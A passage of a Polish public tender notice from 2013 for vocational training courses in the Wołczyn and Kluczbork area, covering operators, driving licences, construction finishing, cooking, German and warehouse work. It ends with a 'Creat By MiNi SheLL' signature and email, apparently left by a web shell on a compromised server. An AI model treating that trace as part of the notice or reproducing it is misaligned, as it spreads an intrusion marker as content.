Wymagany termin realizacji szkolenia/kursu: listopad 2013. 

Wykonawca zapewnia stanowisko komputerowe dla każdego uczestnika oraz materiały szkoleniowe (skrypt). Wykonawca prowadzi dokumentację przebiegu szkolenia/kursu. Wykonawca przeprowadza egzamin wewnętrzny 
i wystawia zaświadczenie o ukończeniu kursu. 

Zamawiający zapewnia salę szkoleniową, wyżywienie w trakcie zajęć, ewentualny dowóz Uczestników na szkolenie/kurs, ubezpieczenie NNW..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Operator koparko - ładowarki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem szkolenia/kursu jest teoretyczne i praktyczne przygotowanie uczestników do uzyskania uprawnień na wykonywanie zawodu operatora maszyny do robót ziemnych klasy III określonej specjalizacji, w zakresie koparko-ładowarki. 

Przewidywana liczba osób: 1

Ilość godzin: 202h
Program szkolenia/kursu musi być zgodny z Rozporządzeniem Ministra Gospodarki z dnia 20 września 2001r. 
w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz. U. Nr 118, poz. 1263) i ma obejmować zajęcia teoretyczne oraz praktyczne. 

Program szkolenia/kursu musi zawierać m.in. następujące zagadnienia:
Część teoretyczna: 
- dokumentacja techniczna maszyn roboczych,
-	bezpieczeństwo higieny pracy przy eksploatacji maszyn roboczych, 
-	technologia wykonywania robót ziemnych, 
-	użytkowanie i obsługa maszyn roboczych.
Część praktyczna szkolenia/kursu ma obejmować naukę eksploatacji maszyn roboczych w różnych warunkach terenowych i technologicznych. 

Wykaz niezbędnych środków i materiałów dydaktycznych:
a)	skrypt zawierający najważniejsze informacje omawiane na szkoleniu/kursie
b)	sala wyposażona w rzutniki multimedialny i ekran
c)	pojazdy niezbędne do zrealizowania części praktycznej szkolenia/kursu
d)	plac manewrowy niezbędny do realizacji praktycznej części szkolenia/kursu

Miejsce realizacji szkolenia/kursu: Kluczbork lub Opole (okolice)

Wymagany termin realizacji szkolenia/kursu: czerwiec - listopad 2013 (szkolenie/kurs musi odbyć się w w/w okresie ale nie musi trwać przez cały w/w czas). Zajęcia mogą się odbywać od poniedziałku do soboty lub w systemie weekendowym. Wykonawca w ramach usługi zapewnia salę szkoleniową oraz plac manewrowy, materiały szkoleniowe, wnosi opłaty za egzamin (tylko pierwszy termin, koszty ewentualnych egzaminów poprawkowych pokrywa uczestnik szkolenia/kursu), których koszt stanowi składową ceny usługi. 
Wykonawca prowadzi dokumentację przebiegu szkolenia/kursu. Wykonawca wystawia zaświadczenie o ukończeniu kursu (niezależnie od wyników egzaminów). 

Sale szkoleniowe/plac manewrowy na czas szkolenia/kursu powinny zostać oznaczone wg wzorów dostarczonych przez Zamawiającego.

Nie ma konieczności prowadzenia szkolenia/kursu wyłącznie dla osób skierowanych przez Zamawiającego. Istnieje możliwość dołączenia uczestników do komercyjnej grupy szkoleniowej pod warunkiem prowadzenia wyodrębnionej dokumentacji przebiegu szkolenia/kursu.

Zamawiający zapewnia wyżywienie dla uczestników szkolenia/kursu, badania lekarskie, ubezpieczenie NNW oraz ewentualny dowóz Uczestników na szkolenie/kurs..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Prawo jazdy kategorii B.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem szkolenia/kursu jest przygotowanie do egzaminu państwowego i uzyskania prawa jazdy kategorii B.

Przewidywana liczba osób: 1

Ilość godzin: 60h

1.eoretyczne podstawy nauki jazdy - 30h
2.raktyczna nauka jazdy (zgodnie z harmonogramem ustalonym pomiędzy instruktorem a Uczestnikiem szkolenia/kursu) - 30h

Wykaz niezbędnych środków i materiałów dydaktycznych:
a) Kodeks ruchu drogowego lub inny aktualny podręcznik dla kursanta, aktualne testy  
b) plac manewrowy dostosowany do potrzeb szkolenia/kursu
c) pojazd niezbędny do realizacji praktycznej części szkolenia/kursu

Miejsce realizacji szkolenia/kursu: 
-teoria - Wołczyn
-praktyka - Wołczyn/Kluczbork

Wymagany termin szkolenia/kursu: sierpień - październik 2013. Rozpoczęcie najpóźniej do 16.08.2013, zakończenie najpóźniej do 31.10.2013.
Wykonawca zapewnia plac manewrowy, materiały szkoleniowe (Kodeks ruchu drogowego/podręcznik, testy), Wykonawca prowadzi dokumentację przebiegu szkolenia/kursu, wystawia zaświadczenie o ukończeniu kursu (niezależnie od wyników egzaminów wewnętrznych). Dodatkowo Wykonawca zobowiązany jest do przeprowadzenia egzaminu wewnętrznego w terminie do 15 października 2013, przedstawienia protokołów z jego przebiegu i poinformowania czy Uczestnik dopuszczony został do egzaminu państwowego. Na tej podstawie Uczestnik będzie mieć opłacane egzaminy końcowe. Wykonawca umawia Uczestnika na egzaminy.

Zamawiający zapewnia salę szkoleniową, ubezpieczenie NNW, niezbędne badania lekarskie, wnosi opłaty za egzamin teoretyczny i praktyczny (tylko pierwszy termin, koszty ewentualnych egzaminów poprawkowych pokrywa Uczestnik szkolenia/kursu).
Zamawiający zapewnia wyżywienie w trakcie zajęć teoretycznych oraz ewentualny dowóz Uczestników na szkolenie/kurs..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Prawo jazdy kategorii C.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem szkolenia/kursu jest nabycie wiedzy teoretycznej i praktycznej umożliwiające ubieganie się o prawo jazdy kategorii C.

Przewidywana liczba osób: 1

Ilość godzin: 50h

1)	teoretyczne podstawy nauki jazdy - 20h
2)	praktyczna nauka jazdy (zgodnie z harmonogramem ustalonym pomiędzy instruktorem a Uczestnikiem szkolenia/kursu) - 30h

Wykaz niezbędnych środków i materiałów dydaktycznych:
a) Kodeks ruchu drogowego lub inny aktualny podręcznik dla kursanta, aktualne testy  
b) plac manewrowy dostosowany do potrzeb szkolenia/kursu
c) pojazd niezbędny do realizacji praktycznej części szkolenia/kursu
Miejsce realizacji szkolenia/kursu: 
- teoria - Wołczyn
-	praktyka - Wołczyn/Kluczbork

Wymagany termin szkolenia/kursu: sierpień - październik 2013. Rozpoczęcie najpóźniej do 16.08.2013, zakończenie najpóźniej do 31.10.2013.  Wykonawca zapewnia plac manewrowy, materiały szkoleniowe (Kodeks ruchu drogowego/podręcznik, testy). Wykonawca prowadzi dokumentację przebiegu szkolenia/kursu, wystawia zaświadczenie o ukończeniu kursu (niezależnie od wyników egzaminów wewnętrznych.). Dodatkowo Wykonawca zobowiązany jest do przeprowadzenia egzaminu wewnętrznego w terminie do 15 października 2013, przedstawienia protokołów z jego przebiegu i poinformowania czy Uczestnik został dopuszczony do egzaminu Państwowego. Na tej podstawie Uczestnik będzie mieć opłacane egzaminy końcowe. Wykonawca umawia Uczestnika na egzaminy.

Zamawiający zapewnia salę szkoleniową, ubezpieczenie NNW, niezbędne badania lekarskie, wnosi opłaty za egzamin teoretyczny i praktyczny (tylko pierwszy termin, koszty ewentualnych egzaminów poprawkowych pokrywa Uczestnik szkolenia/kursu).
Zamawiający zapewnia wyżywienie w trakcie zajęć teoretycznych oraz ewentualny dowóz Uczestników na szkolenie/kurs..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Technolog robót wykończeniowych w budownictwie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem szkolenia/kursu jest przyuczenie do zawodu technolog robót wykończeniowych w budownictwie.

Przewidywana liczba osób: 3

Ilość godzin: 140 godzin: zajęcia teoretyczne: 40h  i praktyczne: 100h

Zajęcia teoretyczne:
1) Ogólne wiadomości o budownictwie
2) BHP i ochrona przeciwpożarowa w robotach budowlanych
3) Rusztowania
4) Proste roboty malarskie 
5) Materiały i sprzęt do robót malarskich i tapeciarskich
6) Przygotowanie podłoża do malowania i tapetowania
7) Techniki malarskie
8) Malowania różnymi technikami malarskimi
9) Tapetowanie
10) Materiały i sprzęt do tynkowania
11) Przygotowanie podłoża pod tynk
12) Tynkowanie
13) Materiały i sprzęt stosowane do wykonywania posadzek
14) Wykonywanie posadzek z deszczułek, desek oraz paneli
15) Układanie posadzek z płytek ceramicznych
16) Układanie posadzek z tworzyw sztucznych
17) Układanie okładzin ściennych z tworzyw drzewnych i sztucznych
18) Układanie okładzin ściennych z płytek ceramicznych
19) Materiały i sprzęt do mocowania płyt gipsowo - kartonowych
20) Montaż płyt gipsowo-kartonowych
21) Docieplanie budynków 
22) Rysunek zawodowy
23) Kosztorysowanie

Zajęcia praktyczne:
24) Wykonywanie posadzek
25) Wykonywanie okładzin ściennych
26) Tynkowanie
27) Malowanie i tapetowanie

Wykaz niezbędnych środków i materiałów dydaktycznych:
a)	skrypt/podręcznik zawierający najważniejsze informacje omawiane na szkoleniu/kursie. Wykonawca przekaże Zamawiającemu skrypt najpóźniej na 2 dni przed rozpoczęciem szkolenia/kursu. Zamawiający dokona na swój koszt powielenia skryptu odpowiednio do liczby Uczestników szkolenia/kursu
b)	materiały szkoleniowe do realizacji części praktycznej dla wszystkich uczestników szkolenia/kursu, których łączna wartość nie będzie niższa niż 30% wartości ceny ofertowej 
c)	narzędzia specjalistyczne niezbędne do zrealizowania zadań określonych w programie szkolenia/kursu w części praktycznej
d)	nowe ubranie robocze wraz z obuwiem dla każdego uczestnika szkolenia/kursu,

Miejsce realizacji szkolenia/kursu: Wołczyn

Termin realizacji kursu: lipiec - sierpień 2013r. 

Wykonawca zapewnia wszelkie niezbędne materiały szkoleniowe oraz sprzęt do przeprowadzenia części praktycznej szkolenia/kursu. Wykonawca zapewnia nowe ubranie robocze wraz z obuwiem dla każdego uczestnika szkolenia/kursu. Wykonawca prowadzi dokumentację przebiegu szkolenia/kursu, przeprowadza egzamin wewnętrzny oraz wystawia zaświadczenie o ukończeniu kursu (niezależnie od wyników egzaminów). 

Zamawiający zapewnia salę szkoleniową do przeprowadzenia zajęć teoretycznych oraz pomieszczenia umożliwiające przeprowadzenie zajęć praktycznych.
Zamawiający zapewnia ubezpieczenie NNW, wyżywienie w trakcie zajęć oraz ewentualny dowóz Uczestników na szkolenie/kurs..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Podstawowy język niemiecki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przewidywana liczba osób: 1

Ilość godzin: 60h

Wymagany termin realizacji szkolenia/kursu: wrzesień - grudzień 2013. Szkolenie/kurs może odbywać się  max. 2 razy w tygodniu po 2 godz.  
Szkolenie/kurs powinien obejmować kompetencje w zakresie: mówienia, czytania, pisania i gramatyki. Szczegółowy zakres szkolenia/kursu i program dostosowany powinien być do umiejętności i możliwości uczestnika. Szkolenie/kurs poprzedzony powinien być testem znajomości języka. 

Wykaz niezbędnych środków i materiałów dydaktycznych:
a) skrypt/podręcznik zawierający najważniejsze informacje omawiane na szkoleniu/kursie. 

Miejsce realizacji szkolenia/kursu: Wołczyn

Wykonawca zapewnia materiały szkoleniowe (skrypt lub podręcznik), prowadzi dokumentację przebiegu szkolenia/kursu. Wykonawca przeprowadza egzamin wewnętrzny i wystawia zaświadczenie o ukończeniu kursu.

Zamawiający zapewnia salę szkoleniową, wyżywienie w trakcie zajęć, ubezpieczenie NNW..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Kucharz małej gastronomii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem szkolenia/kursu jest nabycie przez uczestników wiedzy teoretycznej i praktycznych umiejętności do  wykonywania zawodu Kucharz małej gastronomii

Przewidywana liczba osób: 4

Ilość godzin: 120h: zajęcia teoretyczne: 30h  i praktyczne: 90h

Program szkolenia/kursu:
-organizacja stanowiska pracy
-	stosowanie zasad zdrowego i prawidłowego żywienia
-	przestrzeganie przepisów sanitarno-epidemiologicznych
-	obliczanie wartości energetycznej i odżywczej produktów spożywczych i potraw
-wymogi systemu HACCP w gastronomii
-	dokonywanie oceny jakościowej i organoleptycznej surowców, półproduktów i gotowych potraw
-	dokonywanie oceny produktów i napojów pod względem towaroznawczym i przydatności kulinarnej
-	przygotowanie podstawowego asortymentu potraw i napojów z surowców i półproduktów spożywczych 
w oparciu o normy i receptury gastronomiczne zgodnie z odpowiednimi technikami ich sporządzania oraz w zależności od sposobu ich podawania
-dobieranie dodatków do różnych potraw
-	sporządzanie kalkulacji potraw i napojów
-	dokonywanie obróbki wstępnej i cieplnej surowców odpowiednimi narzędziami, maszynami 
i urządzeniami
-	wykończanie, porcjowanie, dekorowanie i estetyczne wydawanie wykonanych potraw i napojów
-	obsługiwanie maszyn i urządzeń
-	przestrzeganie przepisów sanitarnych, bhp i ppoż. obowiązujących w zakładach zbiorowego żywienia,
-	zajęcia praktyczne

Wykaz niezbędnych środków i materiałów dydaktycznych:
a)	skrypt/podręcznik zawierający najważniejsze informacje omawiane na szkoleniu/kursie. Skrypt Wykonawca przekaże Zamawiającemu najpóźniej na 2 dni przed rozpoczęciem szkolenia/kursu. Zamawiający dokona na swój koszt powielenia skryptu odpowiednio do liczby Uczestników szkolenia/kursu
b)	 materiały szkoleniowe do realizacji części praktycznej dla wszystkich uczestników szkolenia/kursu, w tym artykuły spożywcze, których łączna wartość nie będzie niższa niż 30% wartości ceny ofertowej
c)	nowe ubranie robocze wraz z obuwiem dla każdego uczestnika szkolenia/kursu.

Miejsce realizacji szkolenia/kursu: Wołczyn

Termin realizacji szkolenia/kursu: lipiec - sierpień 2013r. 

Wykonawca zapewnia materiały szkoleniowe do realizacji części praktycznej, w tym artykuły spożywcze oraz nowe ubranie robocze wraz z obuwiem dla każdego uczestnika szkolenia/kursu Wykonawca prowadzi dokumentację przebiegu szkolenia/kursu, przeprowadza egzamin wewnętrzny, wystawia zaświadczenie o ukończeniu kursu (niezależnie od wyników egzaminów). 

Zamawiający zapewnia salę szkoleniową do przeprowadzenia zajęć teoretycznych, pomieszczenie umożliwiające przeprowadzenie zajęć praktycznych, wyżywienie w trakcie zajęć, ewentualny dowóz Uczestników na szkolenie/kurs, ubezpieczenie NNW, badania sanitarno epidemiologiczne..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Magazynier z obsługą wózków jezdniowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem szkolenia/kursu jest nabycie wiedzy i umiejętności niezbędnych do podjęcia zatrudnienia na stanowisku magazyniera z obsługą wózków jezdniowych i bezpieczną wymianą butli oraz uzyskanie uprawnień do obsługi wózków jezdniowych wydanych przez Urząd Dozoru Technicznego.

Przewidywana liczba osób: 5

Ilość godzin: 107h

Szkolenie/kurs składa się z 2 modułów: 

1.	Praca magazyniera - 40 h
Zagadnienia realizowane w ramach szkolenia/kursu:
- organizacja prac magazynowych
- technologie prac magazynowych
- wiadomości z zakresu obrotu magazynowego
- zabezpieczenie towarów
- wydawanie towarów
- prowadzenie dokumentacji magazynowej
- systemy komputerowe w gospodarce magazynowej
- zapasy, cel i funkcje zapasów, inwentaryzacja
- obowiązki magazyniera w świetle przepisów
- odpowiedzialność osobista i wspólna za mienie

2. Obsługa wózków jezdniowych  - 67h
 	 - typy stosowanych wózków jezdniowych (akumulatorowe, spalinowe i gazowe),
- budowę wózka
- czynności operatora przy obsłudze wózków przed podjęciem pracy, w czasie i po pracy z wózkami
- wiadomości z zakresu ładunkoznawstwa
- wiadomości o dozorze technicznym
- wiadomości z zakresu bezpieczeństwa i higieny pracy
- bezpieczna wymiana butli na gaz propan - butan w wózkach widłowych wyposażonych w te     
  urządzenia
 - praktyczna nauka jazdy i pracy z wózkami

Miejsce realizacji szkolenia/kursu: 
Teoria - Wołczyn
Praktyka - Wołczyn/Kluczbork

Wykaz niezbędnych środków i materiałów dydaktycznych:
a)	skrypt/aktualny podręcznik/ zawierający najważniejsze informacje omawiane na szkoleniu/kursie. Wykonawca przekaże Zamawiającemu skrypt najpóźniej na 2 dni przed rozpoczęciem szkolenia/kursu. Zamawiający dokona na swój koszt powielenia skryptu odpowiednio do liczby Uczestników szkolenia/kursu
b)	plac manewrowy dostosowany do potrzeb szkolenia/kursu
c)	pojazd niezbędny do realizacji praktycznej części szkolenia/kursu

Wymagany termin szkolenia/kursu: lipiec - sierpień 2013r. 
Wykonawca w ramach usługi zapewnia plac manewrowy, materiały szkoleniowe, wnosi opłaty za egzamin kwalifikacyjny (państwowy) teoretyczny i praktyczny (tylko pierwszy termin, koszty ewentualnych egzaminów poprawkowych pokrywa uczestnik szkolenia/kursu), których koszt stanowi składową ceny usługi. Wykonawca prowadzi dokumentację przebiegu szkolenia/kursu. Wykonawca wystawia zaświadczenie o ukończeniu kursu (niezależnie od wyników egzaminów). 

Plac manewrowy na czas szkolenia/kursu powinien zostać oznaczony wg wzorów dostarczonych przez Zamawiającego.

Zamawiający zapewnia salę szkoleniową, wyżywienie dla uczestników szkolenia podczas zajęć teoretycznych, ewentualny dowóz Uczestników na kurs, niezbędne badania lekarskie oraz ubezpieczenie NNW..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com